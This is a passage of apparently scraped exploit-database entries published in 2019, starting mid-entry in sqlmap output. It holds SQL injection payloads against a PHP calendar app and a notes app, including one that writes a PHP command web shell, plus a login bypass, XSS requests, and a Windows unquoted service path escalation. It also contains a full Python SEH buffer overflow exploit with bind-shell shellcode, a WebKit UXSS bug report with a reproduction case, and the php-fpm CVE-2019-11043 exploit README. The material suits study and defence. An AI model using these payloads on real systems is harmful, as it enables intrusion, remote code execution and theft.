x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6752 FROM (SELECT(SLEEP(5)))ImfQ) AND 'EAnH'='EAnH&end=2019-01-24 00:00:00 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Parameter: end (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' RLIKE (SELECT (CASE WHEN (4825=4825) THEN 
0x323031392d30312d32342030303a30303a3030 ELSE 0x28 END)) AND 'xqhi'='xqhi Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 4638 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(4638=4638,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OvvR'='OvvR Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 6750 FROM (SELECT(SLEEP(5)))gPYF) AND 'Xhni'='Xhni Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Parameter: title (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: title=Test'||(SELECT 0x68506d50 FROM DUAL WHERE 9657=9657 AND 5501=5501)||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: AND [INFERENCE] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: title=Test'||(SELECT 0x684f4b6d FROM DUAL WHERE 1515=1515 AND (SELECT 6271 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6271=6271,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 
5.0.12 AND time-based blind (query SLEEP) Payload: title=Test'||(SELECT 0x72417477 FROM DUAL WHERE 3543=3543 AND (SELECT 4482 FROM (SELECT(SLEEP(5)))AnGw))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Parameter: description (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: title=Test&description=Test'||(SELECT 0x7570456a FROM DUAL WHERE 7753=7753 AND 5528=5528)||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: AND [INFERENCE] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: title=Test&description=Test'||(SELECT 0x4f6d6f41 FROM DUAL WHERE 6915=6915 AND (SELECT 9677 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(9677=9677,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=Test&description=Test'||(SELECT 0x6a424e63 FROM DUAL WHERE 6961=6961 AND (SELECT 9467 FROM (SELECT(SLEEP(5)))jHfq))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Parameter: color (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: title=Test&description=Test&color=#0071c5' RLIKE (SELECT (CASE WHEN (2320=2320) THEN 0x23303037316335 ELSE 0x28 END)) AND 'XfIW'='XfIW&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: RLIKE (SELECT (CASE WHEN 
([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 2035 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(2035=2035,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'nWLO'='nWLO&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 7165 FROM (SELECT(SLEEP(5)))kngP) AND 'oklj'='oklj&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
  18. # Exploit Title: Part-DB 0.4 - Authentication Bypass # Date: 2019-10-26 # Author: Marvoloo # Vendor Homepage: https://github.com/Part-DB/Part-DB/ # Software Link: https://github.com/Part-DB/Part-DB/archive/master.zip # Version: 0.4 # Tested on: Linux # CVE : N/A # Description: # An easy authentication bypass vulnerability in the application # allows the attacker to log in # url: http://localhost/login.php # Parameter & Payload: '=''or' #vulnerable file: login.php Line: 29,30 #POC POST /login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/login.php Content-Type: application/x-www-form-urlencoded Content-Length: 24 Cookie: .... Connection: close Upgrade-Insecure-Requests: 1 DNT: 1
  19. Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting Date: 2019-10-28 Exploit Author: Cakes Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git Version: 1.21 Tested on: CentOS7 CVE : N/A # Description: # Cross-Site scripting vulnerability in the description field. This XSS completely breaks the web application. #POC POST /addEvent.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.20/calendar03/ Content-Type: application/x-www-form-urlencoded Content-Length: 213 Cookie: PHPSESSID=t41kk4huqaluhcfghvqqvucl56 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 title=%3Cscript%3Ealert%28%22TEST-Title%22%29%3B%3C%2Fscript%3E&description=%3Cscript%3Ealert%28%22TEST-Description%22%29%3B%3C%2Fscript%3E&color=%230071c5&start=2019-01-23+00%3A00%3A00&end=2019-01-24+00%3A00%3A00
  20. # Exploit Title: JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path # Google Dork: N/A # Date: 2019-09-09 # Exploit Author: Roberto Escamilla # Vendor Homepage:https://www.inforprograma.net/ # Software Link: https://www.inforprograma.net/ # Version: = 0.6.0.0 wpspin.exe # Tested on: Windows 10 Home # CVE : N/A ###############STEPS########################## # 1.- Install the JumpStart application on Windows 10 Home Operating System # 2.- Open our "System Symbol" application. # 3.- Execute the command -------wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ # 4.- The following will appear in a list: JumpStart Push-Button Service jswpbapi C:\Program Files (x86)\Jumpstart\jswpbapi.exe # 5.- We proceed to verify the process using the command icacls, with which we verify the protection of the directory as shown below: NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administradores:(I)(F) BUILTIN\Usuarios:(I)(RX) ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(RX) ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX) # 6.- Finally we verify using the command sc qc jswpbapi the protection of the service in which we observe that it is scalable in privileges # since the route contains spaces without being in quotes and is in CONTROL_ERROR normal and NOMBRE_INICIO_SERVICIO: # LocalSystem as it's shown in the following [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: jswpbapi TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Jumpstart\jswpbapi.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : JumpStart Push-Button Service DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem
  21. Exploit Title: delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection Date: 2019-10-28 Exploit Author: Cakes Vendor Homepage: https://github.com/delpino73/Blue-Smiley-Organizer Software Link: https://github.com/delpino73/Blue-Smiley-Organizer.git Version: 1.32 Tested on: CentOS7 CVE : N/A # PoC: Multiple SQL Injection vulnerabilities # Nice and easy SQL Injection Parameter: datetime (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: datetime=2019-10-27 10:53:00' AND 6315=(SELECT (CASE WHEN (6315=6315) THEN 6315 ELSE (SELECT 3012 UNION SELECT 2464) END))-- sQtq&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT] Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: datetime=2019-10-27 10:53:00' AND (SELECT 7239 FROM (SELECT(SLEEP(5)))wrOx)-- cDKQ&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) # Pop a PHP CMD Shell ' LIMIT 0,1 INTO OUTFILE '/Path/To/Folder/upload/exec.php' LINES TERMINATED BY 0x3c3f7068702024636d64203d207368656c6c5f6578656328245f4745545b27636d64275d293b206563686f2024636d643b203f3e-- -
  22. # Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH) # Date: 2019-10-27 # Exploit Author: Chase Hatch (SYANiDE) # Vendor Homepage: http://www.chaospro.de/ # Software link: http://www.chaospro.de/cpro20.zip # Version: 2.0 # Tested on: Windows XP Pro OEM #!/usr/bin/env python2 import os, sys # sploit = "A"* 5000 ## Crash! 41414141 in SEH! via ProfilePath or PicturePath. Windows XP OEM # `locate pattern_create.rb | head -n 1` 5000 # 326d4431 # `locate pattern_offset.rb | head -n 1` 326d4431 5000 # 2705 # sploit = "A" * (2705 - 4 - 126) # 2575 # sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE # `locate pattern_offset.rb|head -n 1` 61413561 2575 # 16 ################ Second stage #################### sploit = "A"*16 # msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh #, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c sploit += ( "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70" "\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50" "\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b" "\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50" "\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c" "\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b" "\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30" "\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b" "\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70" "\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63" "\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f" "\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b" "\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d" 
"\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77" "\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78" "\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a" "\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31" "\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52" "\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63" "\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43" "\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f" "\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f" "\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30" "\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49" "\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f" "\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73" "\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76" "\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a" "\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f" "\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b" "\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d" "\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47" "\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56" "\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58" "\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44" "\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42" "\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56" "\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69" "\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f" "\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a" "\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46" "\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31" "\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b" "\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69" "\x6f\x39\x45\x41\x41" ) # 710 bytes sploit += 
"A" * (2575 - 16 - 710) ################ First stage #################### # ESP: 0012E75C # ESP target: 0012FF98 ## Need to align to four-byte and 16-byte boundaries: # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc # 282.0000 # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc # 1551.0000 # echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc # 183C # 0012FF32 54 PUSH ESP # 0012FF33 58 POP EAX # 0012FF34 66:05 3C18 ADD AX,183C # 0012FF38 50 PUSH EAX # 0012FF39 5C POP ESP sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8 # target instruction to push onto stack at new ESP: FFE4 JMP ESP # 4141E4FF # ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803 # 0: 25 28 28 28 28 and eax,0x28282828 # 5: 25 47 47 47 47 and eax,0x47474747 # a: 2d 7f 01 7f 7f sub eax,0x7f7f017f # f: 2d 7f 01 01 01 sub eax,0x101017f # 14: 2d 03 18 3e 3e sub eax,0x3e3e1803 # 19: 50 push eax sploit += ( "\x25\x28\x28\x28\x28" "\x25\x47\x47\x47\x47" "\x2d\x7f\x01\x7f\x7f" "\x2d\x7f\x01\x01\x01" "\x2d\x03\x18\x3e\x3e" "\x50" ) # 26 bytes ## Realign new ESP with beginning of overflow buffer: ## New ESP should be four-byte and 16-byte aligned: # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc # 122.0000 # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc # 671.0000 # echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc # A7C ## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean) # 0012FF54 44 INC ESP # 0012FF55 44 INC ESP # 0012FF56 44 INC ESP # 0012FF57 44 INC ESP # 0012FF58 44 INC ESP # 0012FF59 44 INC ESP # 0012FF5A 44 INC ESP # 0012FF5B 44 INC ESP sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8 ## Going to have to carve out the address 0012F51C # ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864 # 0: 25 02 02 02 02 and eax,0x2020202 # 5: 25 51 51 51 51 and eax,0x51515151 # a: 2d 7f 01 7f 7f sub eax,0x7f7f017f # f: 2d 01 01 01 61 sub eax,0x61010101 # 14: 
2d 64 08 6d 1f sub eax,0x1f6d0864 # 19: 50 push eax sploit +=( "\x25\x02\x02\x02\x02" "\x25\x51\x51\x51\x51" "\x2d\x7f\x01\x7f\x7f" "\x2d\x01\x01\x01\x61" "\x2d\x64\x08\x6d\x1f" "\x50" ) # 26 bytes ## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP # 5C POP ESP sploit += "\x5c" # 1 sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1) ################ RET from SEH: JMP SHORT - 126 #################### sploit += "\xeb\x80" + "\x41\x41" # 4 # 00401B44 |. 5F POP EDI # 00401B45 |> 5E POP ESI # 00401B46 \. C3 RETN sploit += "\x44\x1b\x40\x00" ################ build the config #################### ## Running from just outside base directory of ChaosPro: def ret_cfg(inp): # do it live in PicturePath cfg = """PicturePath %s""" % inp with open("chaospro\\ChaosPro.cfg",'w') as F: F.write(cfg) F.close() ret_cfg(sploit)
  23. VULNERABILITY DETAILS HTMLFrameElementBase.cpp: ``` bool HTMLFrameElementBase::isURLAllowed() const { if (m_URL.isEmpty()) // ***4*** return true; return isURLAllowed(document().completeURL(m_URL)); } bool HTMLFrameElementBase::isURLAllowed(const URL& completeURL) const { if (document().page() && document().page()->subframeCount() >= Page::maxNumberOfFrames) // ***3*** return false; if (completeURL.isEmpty()) return true; if (WTF::protocolIsJavaScript(completeURL)) { RefPtr<Document> contentDoc = this->contentDocument(); if (contentDoc && !ScriptController::canAccessFromCurrentOrigin(contentDoc->frame(), document())) return false; } RefPtr<Frame> parentFrame = document().frame(); if (parentFrame) return parentFrame->isURLAllowed(completeURL); return true; } void HTMLFrameElementBase::openURL(LockHistory lockHistory, LockBackForwardList lockBackForwardList) { if (!isURLAllowed()) return; [...] parentFrame->loader().subframeLoader().requestFrame(*this, m_URL, frameName, lockHistory, lockBackForwardList); ``` NodeRarData.h: ``` class NodeRareData : public NodeRareDataBase { [...] private: unsigned m_connectedFrameCount : 10; // Must fit Page::maxNumberOfFrames. ***1*** ``` Page.h: ``` class Page : public Supplementable<Page>, public CanMakeWeakPtr<Page> { [...] // Don't allow more than a certain number of frames in a page. // This seems like a reasonable upper bound, and otherwise mutually // recursive frameset pages can quickly bring the program to its knees // with exponential growth in the number of frames. static const int maxNumberOfFrames = 1000; // ***2*** ``` Every DOM node stores the number of child frames currently attached to the subtree to speed up the `disconnectSubframes` algorithm; more specifically, when the number of connected frames for a given node is zero, its subtree won't be traversed. 
The value is stored as a 10-bit integer[1], so, to protect it from overflowing, an upper bound for the total count of attached subframes has been introduced[2]. It's enforced inside `isURLAllowed`[3] along with some other URL-specific checks. The problem is that when the current URL is empty, all of these checks are skipped[4]. Therefore, an attacker can insert exactly 1024 frame elements with an empty URL into a node, so its 10-bit connected-subframe counter wraps around to zero. Later, when the node is removed from the document tree, the subframes won't be detached. The attacker can also abuse the flaw to make a subframe "survive" a cross-origin page load because `disconnectDescendantFrames`, which is called during the document replacement, only processes `iframe` elements inside the document tree. Then, if the subframe is navigated to the `about:srcdoc` URL, the new document will inherit the security context from its parent document, which can be an arbitrary cross-origin page, while the contents will be attacker-controlled. Moving the check closer to the actual frame creation in `SubframeLoader::loadSubframe` should fix the issue. Moreover, since the `srcdoc` technique can be reused in other UXSS bugs, I think it's reasonable to try to break it. One way to achieve that is to replace the `disconnectDescendantFrames` call in `Document::prepareForDestruction` with a call to `FrameLoader::detachChildren`, which detaches subframes regardless of whether their associated elements are attached to the document tree. However, I'm not sure if this change would be safe. The attached patch just adds a release assertion after `disconnectDescendantFrames` to ensure that all subframes have been detached. The solution is not too elegant, but a similar fix in Blink (https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/dom/document.cc?rcl=a34380189132e826108a71d9f6024b863ce1dcaf&l=3115) has proved to be effective. 
VERSION WebKit revision 247430 Safari version 12.1.1 (14607.2.6.1.1) REPRODUCTION CASE The minimal test case that demonstrates the issue is as follows: ``` <body> <script> const FRAME_COUNT = 1024; let container = document.body.appendChild(document.createElement('div')); for (let i = 0; i < FRAME_COUNT; ++i) { let frame = container.appendChild(document.createElement('iframe')); frame.style.display = 'none'; } container.remove(); frame = container.firstChild; alert(` <iframe> is not attached to the document tree, but still has a content frame! frame.parentNode.parentNode: ${frame.parentNode.parentNode} frame.contentWindow: ${frame.contentWindow} `); </script> </body> ``` The full UXSS exploit is in the attached archive. CREDIT INFORMATION Sergei Glazunov of Google Project Zero Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47552.zip
  24. # PHuiP-FPizdaM ## What's this This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations, the bug is possible to trigger from the outside. This means that a web user may get code execution if you have a vulnerable config (see [below](#the-full-list-of-preconditions)). ## What's vulnerable If a webserver runs nginx + php-fpm and nginx has a configuration like ``` location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... } ``` which also lacks any script existence checks (like `try_files`), then you can probably hack it with this sploit. #### The full list of preconditions 1. Nginx + php-fpm, `location ~ [^/]\.php(/|$)` must be forwarded to php-fpm (maybe the regexp can be stricter, see [#1](https://github.com/neex/phuip-fpizdam/issues/1)). 2. The `fastcgi_split_path_info` directive must be there and contain a regexp starting with `^` and ending with `$`, so we can break it with a newline character. 3. There must be a `PATH_INFO` variable assignment via the statement `fastcgi_param PATH_INFO $fastcgi_path_info;`. At first, we thought it is always present in the `fastcgi_params` file, but that's not true. 4. No file existence checks like `try_files $uri =404` or `if (-f $uri)`. If Nginx drops requests to non-existing scripts before FastCGI forwarding, our requests never reach php-fpm. Adding such a check is also the easiest mitigation. 5. This exploit works only for PHP 7+, but the bug itself is present in earlier versions (see [below](#about-php5)). ## Isn't this known to be vulnerable for years? A long time ago php-fpm didn't restrict the extensions of the scripts, meaning that something like `/avatar.png/some-fake-shit.php` could execute `avatar.png` as a PHP script. This issue was fixed around 2010. 
The current one doesn't require file upload, works in the most recent versions (until the fix has landed), and, most importantly, the exploit is much cooler. ## How to run Install it using ``` go get github.com/neex/phuip-fpizdam ``` If you get strange compilation errors, make sure you're using go >= 1.13. Run the program using `phuip-fpizdam [url]` (assuming you have the `$GOPATH/bin` inside your `$PATH`, otherwise specify the full path to the binary). Good output looks like this: ``` 2019/10/01 02:46:15 Base status code is 200 2019/10/01 02:46:15 Status code 500 for qsl=1745, adding as a candidate 2019/10/01 02:46:15 The target is probably vulnerable. Possible QSLs: [1735 1740 1745] 2019/10/01 02:46:16 Attack params found: --qsl 1735 --pisos 126 --skip-detect 2019/10/01 02:46:16 Trying to set "session.auto_start=0"... 2019/10/01 02:46:16 Detect() returned attack params: --qsl 1735 --pisos 126 --skip-detect <-- REMEMBER THIS 2019/10/01 02:46:16 Performing attack using php.ini settings... 2019/10/01 02:46:40 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs 2019/10/01 02:46:40 Trying to cleanup /tmp/a... 2019/10/01 02:46:40 Done! ``` After this, you can start appending `?a=<your command>` to all PHP scripts (you may need multiple retries). ## Playground environment If you want to reproduce the issue or play with the exploit locally, do the following: 1. Clone this repo and go to the `reproducer` directory. 2. Create the docker image using `docker build -t reproduce-cve-2019-11043 .`. It takes a long time as it internally clones the php repository and builds it from the source. However, it will be easier this way if you want to debug the exploit. The revision built is the one right before the fix. 2. Run the docker using `docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043`. 3. Now you have http://127.0.0.1:8080/script.php, which is an empty file. 4. 
Run the exploit using `phuip-fpizdam http://127.0.0.1:8080/script.php` 5. If everything is ok, you'll be able to execute commands by appending `?a=` to the script: http://127.0.0.1:8080/script.php?a=id. Try multiple times, as only some of the php-fpm workers are affected. ## About PHP5 The buffer underflow in php-fpm is present in PHP version 5. However, this exploit makes use of an optimization used for storing FastCGI variables, [_fcgi_data_seg](https://github.com/php/php-src/blob/5d6e923/main/fastcgi.c#L186). This optimization is present only in php 7, so this particular exploit works only for php 7. There might be another exploitation technique that works in php 5. ## Credits Original anomaly discovered by [d90pwn](https://twitter.com/d90pwn) during Real World CTF. Root cause found by me (Emil Lerner) as well as the way to set php.ini options. The final php.ini options set was found by [beched](https://twitter.com/ahack_ru). EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47553.zip
